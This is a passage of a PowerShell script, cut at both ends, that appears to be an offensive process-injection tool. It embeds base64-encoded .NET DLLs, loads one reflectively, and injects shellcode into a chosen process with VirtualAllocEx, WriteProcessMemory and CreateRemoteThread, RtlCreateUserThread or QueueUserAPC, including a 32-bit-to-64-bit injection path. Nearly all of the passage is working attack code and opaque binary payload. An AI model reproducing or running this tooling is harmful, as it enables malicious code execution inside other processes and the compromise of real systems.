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IAAcACQAHAAAAAAAAPE1vZHVsZT4AQ3JlYXRlVGhyZWFkNjQuZGxsAFV0aWwAVGhyZWFkAFdPVzY0Q09OVEVYVABFWEVDVVRFNjRDT05URVhUAEFsbG9jYXRpb25UeXBlAE1lbW9yeVByb3RlY3Rpb24AbXNjb3JsaWIAU3lzdGVtAE9iamVjdABWYWx1ZVR5cGUARW51bQBWaXJ0dWFsQWxsb2MAVmlydHVhbEZyZWUAV2FpdEZvclNpbmdsZU9iamVjdABDcmVhdGVUaHJlYWQASXNXb3c2NFByb2Nlc3MAUmVzdW1lVGhyZWFkAElzV293NjQAQ3JlYXRlUmVtb3RlVGhyZWFkNjQALmN0b3IAaFByb2Nlc3MAYlBhZGRpbmcxAGxwU3RhcnRBZGRyZXNzAGJQYWRkaW5nMgBscFBhcmFtZXRlcgBiUGFkZGluZzMAaFRocmVhZABiUGFkZGluZzQAdmFsdWVfXwBDb21taXQAUmVzZXJ2ZQBEZWNvbW1pdABSZWxlYXNlAEV4ZWN1dGVSZWFkV3JpdGUAbHBBZGRyZXNzAGR3U2l6ZQBmbEFsbG9jYXRpb25UeXBlAGZsUHJvdGVjdABkd0ZyZWVUeXBlAGhIYW5kbGUAZHdNaWxsaXNlY29uZHMAbHBUaHJlYWRBdHRyaWJ1dGVzAGR3U3RhY2tTaXplAGR3Q3JlYXRpb25GbGFncwBscFRocmVhZElkAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUATWFyc2hhbEFzQXR0cmlidXRlAFVubWFuYWdlZFR5cGUASW5BdHRyaWJ1dGUAd293NjRQcm9jZXNzAFN5c3RlbS5SZWZsZWN0aW9uAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUN1bHR1cmVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEFzc2VtYmx5VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBEZWJ1Z2dhYmxlQXR0cmlidXRlAERlYnVnZ2luZ01vZGVzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBDcmVhdGVUaHJlYWQ2NABEbGxJbXBvcnRBdHRyaWJ1dGUAa2VybmVsMzIuZGxsAEtlcm5lbDMyLmRsbABFbnZpcm9ubWVudABPcGVyYXRpbmdTeXN0ZW0AZ2V0X09TVmVyc2lvbgBWZXJzaW9uAGdldF9WZXJzaW9uAGdldF9NYWpvcgBnZXRfTWlub3IAUHJvY2VzcwBHZXRDdXJyZW50UHJvY2VzcwBnZXRfSGFuZGxlAElEaXNwb3NhYmxlAERpc3Bvc2UASW50UHRyAFplcm8AZ2V0X1NpemUAQnl0ZQA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57NTQzN0I0MDEtOTUwNi00NUI0LUEyMzQtOTc4NkEzNTA5QjMzfQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTgyACQkbWV0aG9kMHg2MDAwMDA4LTEAUnVudGltZUhlbHBlcnMAQXJyYXkAUnVudGltZUZpZWxkSGFuZGxlAEluaXRpYWxpemVBcnJheQBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTI4MgAkJG1ldGhvZDB4NjAwMDAwOC0yAG9wX0V4cGxpY2l0AG9wX0luZXF1YWxpdHkATWFyc2hhbABDb3B5AFNpemVPZgBBbGxvY0hHbG9iYWwAU3RydWN0dXJlVG9QdHIARnJlZUhHbG9iYWwAU3RydWN0TGF5b3V0QXR0cmlidXRlAExheW91dEtpbmQARmllbGRPZmZzZXRBdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAAAAAAyAAAAAAAAG0N1QGlbRFojSXhqNQmzMACLd6XFYZNOCJCQAEGBgYERQRGAcAAwI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" $libraw = [System.Convert]::FromBase64String($lib) $a = [System.Reflection.Assembly]::Load($libraw) echo "[+] Injecting from 32bit to 64bit - Loading alternative library for CreateRemoteThread64" } } else { echo "[+] Current process arch is x64: $PID" $64to32 = $false } echo "" if ($Proceed) { try { [IntPtr]$phandle = [Inject]::OpenProcess([Inject]::PROCESS_ALL_ACCESS, $false, $ProcessIDVal); [IntPtr]$zz = 0x10000 [IntPtr]$x = 0 [IntPtr]$nul = 0 [IntPtr]$max = 0x70000000 while( $zz.ToInt32() -lt $max.ToInt32() ) { $x=[Inject]::VirtualAllocEx($phandle,$zz,$Shellcode.Length*2,0x3000,0x40) if( $x.ToInt32() -ne $nul.ToInt32() ){ break } $zz = [Int32]$zz + $Shellcode.Length } echo "VirtualAllocEx" echo "[+] $x" if( $x.ToInt32() -gt $nul.ToInt32() ) { $hg = [Runtime.InteropServices.Marshal]::AllocHGlobal($Shellcode.Length) [Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length) $s = [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0) echo "WriteProcessMemory" echo "[+] $s" if ($RtlCreateUserThread.IsPresent){ $TokenHandle = [IntPtr]::Zero $c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0) echo "RtlCreateUserThread" $hexVal = "{0:x}" -f $c if ($hexVal -eq "c0000022") { echo "[-] Access Denied 0xC0000022" } else { echo "[+] Dec: $c" echo "[+] Hex: 0x$($hexVal)" } } elseif ($QueueUserAPC.IsPresent) { $QueuePtr = [IntPtr]::Zero $TokenHandle = [IntPtr]::Zero echo "QueueUserAPC" echo "[+] ThreadID dwThreadID: $injectpiddwThreadID" echo "[+] Handle hThread: $injectpidhThread" $otptr = [Inject]::OpenThread(0x0010,$false,[int]$injectpiddwThreadID) $QueuePtr = [Inject]::QueueUserAPC($x,$otptr, $TokenHandle) $ResumeThread = [Inject]::ResumeThread($injectpidhThread) echo "[+] Resume Thread Return Value: $ResumeThread" $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() } else { if ($64to32) { $e = [Thread.Util]::CreateRemoteThread64($phandle.ToInt32(),$x.ToInt32(),0) echo "CreateRemoteThread64" $e = 1241 } else { $e = [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0) echo "CreateRemoteThread" } $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() echo "[+] $e" if ($e -eq 0) { $TokenHandle = [IntPtr]::Zero $c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0) echo "RtlCreateUserThread" $hexVal = "{0:x}" -f $c if ($hexVal -eq "c0000022") { echo "[-] Access Denied 0xC0000022" } else { echo "[+] Dec: $c" echo "[+] Hex: 0x$($hexVal)" } } } $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() echo "[-] LastError: $Lasterror" } else { echo "[-] Failed using VirtualAllocEx" $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() echo "[-] LastError: $Lasterror" echo "" } } catch { echo $Error[0] } # Close all handles } } $psloadedprochandler = $null Function IsProcess-x86 ($processID) { if ($psloadedprochandler -ne "TRUE") { $script:psloadedprochandler = "TRUE" $ps = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACx/YFoAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAAJicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANQmAABPAAAAAEAAAKgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAACcJQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAALAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAIJwAAAAAAAEgAAAACAAUAUCAAAEwFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAMQBAAAjfgAAMAIAAEACAAAjU3RyaW5ncwAAAABwBAAABAAAACNVUwB0BAAAEAAAACNHVUlEAAAAhAQAAMgAAAAjQmxvYgAAAAAAAAACAAABRzUAFAkAAAAA+gEzABYAAAEAAAAPAAAAAgAAAAEAAAADAAAADQAAAA0AAAACAAAAAQAAAAEAAAABAAAAAQAAAAAAegEBAAAAAAAGAOIA7QEGAE8B7QEGAC8AuwEPAA0CAAAGAFcAlAEGAMUAlAEGAKYAlAEGADYBlAEGAAIBlAEGABsBlAEGAG4AlAEGAEMAzgEGACEAzgEGAIkAlAEGADgCjQEAAAAAAQAAAAAAAQABAIEBEACmAQAAPQABAAEAAAAAAIAAliAcAiUAAQAAIAAAAAABAAEAEwACIAIAKwIJALUBAQARALUBBgAZALUBCgApALUBEAAxALUBEAA5ALUBEABBALUBEABJALUBEABRALUBEABZALUBEABhALUBFQBpALUBEABxALUBEAAuAAsALAAuABMANQAuABsAVAAuACMAXQAuACsAcQAuADMAcQAuADsAcQAuAEMAXQAuAEsAdwAuAFMAcQAuAFsAcQAuAGMAjwAuAGsAuQADACMABwAjAG0BQAEDABwCAQAEgAAAAQAAAAAAAAAAAAAAAACmAQAAAgAAAAAAAAAAAAAAGgAKAAAAAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAHByb2Nlc3NIYW5kbGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBrZXJuZWwzMi5kbGwAUHJvY2Vzc0hhbmRsZXIuZGxsAFN5c3RlbQBTeXN0ZW0uUmVmbGVjdGlvbgBQcm9jZXNzSGFuZGxlcgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMASXNXb3c2NFByb2Nlc3MAd293NjRQcm9jZXNzAE9iamVjdAAAAAAAAMe7zDzTzepJlqlyZm7cVhgABCABAQgDIAABBSABARERBCABAQ4EIAEBAgi3elxWGTTgiQECBgACAhgQAggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAATAQAOUHJvY2Vzc0hhbmRsZXIAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQ1ZjgyNWQwMC00N2QwLTQ2YWItYTc5Ny1lNGE5Yjk1N2U1N2YAAAwBAAcxLjAuMC4wAAAAAAAAAAArf2BaAAAAAAIAAAAcAQAAuCUAALgHAABSU0RTRWkwPXJV1k+vS2U2WvlSPAEAAABDOlxVc2Vyc1xhZG1pblxzb3VyY2VccmVwb3NcUHJvY2Vzc0hhbmRsZXJcUHJvY2Vzc0hhbmRsZXJcb2JqXFJlbGVhc2VcUHJvY2Vzc0hhbmRsZXIucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPwmAAAAAAAAAAAAABYnAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIJwAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAABMAwAAAAAAAAAAAABMAzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAErAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAiAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAEYADwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABQAHIAbwBjAGUAcwBzAEgAYQBuAGQAbABlAHIAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAEYAEwABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAUAByAG8AYwBlAHMAcwBIAGEAbgBkAGwAZQByAC4AZABsAGwAAAAAAEgAEgABAEwAZQBnAGEAbABDAG8A